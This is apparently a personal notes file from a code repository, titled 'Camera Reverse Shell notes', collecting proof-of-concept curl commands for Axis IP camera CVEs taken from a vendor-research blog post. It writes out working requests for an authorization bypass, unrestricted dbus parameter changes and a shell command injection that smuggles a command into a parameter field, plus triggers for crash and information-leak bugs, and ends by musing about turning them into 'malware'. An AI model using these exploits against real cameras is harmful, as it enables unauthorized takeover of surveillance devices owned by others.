-
Notifications
You must be signed in to change notification settings - Fork 0
/
Camera Reverse Shell notes.txt
66 lines (29 loc) · 1.91 KB
/
Camera Reverse Shell notes.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
----CVE-2018-10661 – Authorization bypass vulnerability
Below is a POC that shows this bypass
_SERVER="<camera-ip>"
curl -i "http://${_SERVER}/index.html/a.srv" --data "action=abc&return_page=it_worked"
-----CVE-2018-10662 – Unrestricted dbus access for users of the .srv functionality:
Below is a POC of this that enables the axis watermark overlay
_SERVER="<camera-ip>"
_PARAM_NAME="root.Image.I0.Overlay.enabled"
_PARAM_VALUE="yes"
curl "http://${_SERVER}/index.html/a.srv" --data "action=dbus&args=--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.setParameter string:$_PARAM_NAME string:$_PARAM_VALUE"
curl "http://${_SERVER}/index.html/a.srv" --data "action=dbus&args=--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.SynchParameters"
----CVE-2018-10660 – Shell command injection vulnerability:
Below is a POC
_SERVER="<camera-ip>"
ROOT_USER="<username>"
ROOT_PWD="<password>"
_INJECTED_COMMAND=";<insert-cmd>;"
curl --digest --user ${ROOT_USER}:${ROOT_PWD} "http://${_SERVER}/axis-cgi/param.cgi?action=update&Time.DST.Enabled=${_INJECTED_COMMAND}"
Unreleated vulnerabilities:
CVE-2018-10664 – Crashing the httpd process:
This vulnerability is triggered by issuing an HTTP request to a .cgi script URL, with a PATH_INFO that ends with the .srv extension.
CVE-2018-10663 Information Leakage vulnerability in the /bin/ssid process:
do 10661, action=get_htmlform&return_page=<long input, 228/300 "a"s>
CVE-2018-10658 Crashing the /bin/ssid process
do 10661, action=dbus&arg=--system --dest=com.b /com/a com.a
CVE-2018-10659 Crashing of the /bin/ssid process.
do 10661, action=get
from: https://web.archive.org/web/20180628070550/https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/
this might be a fun thing to test making a "malware"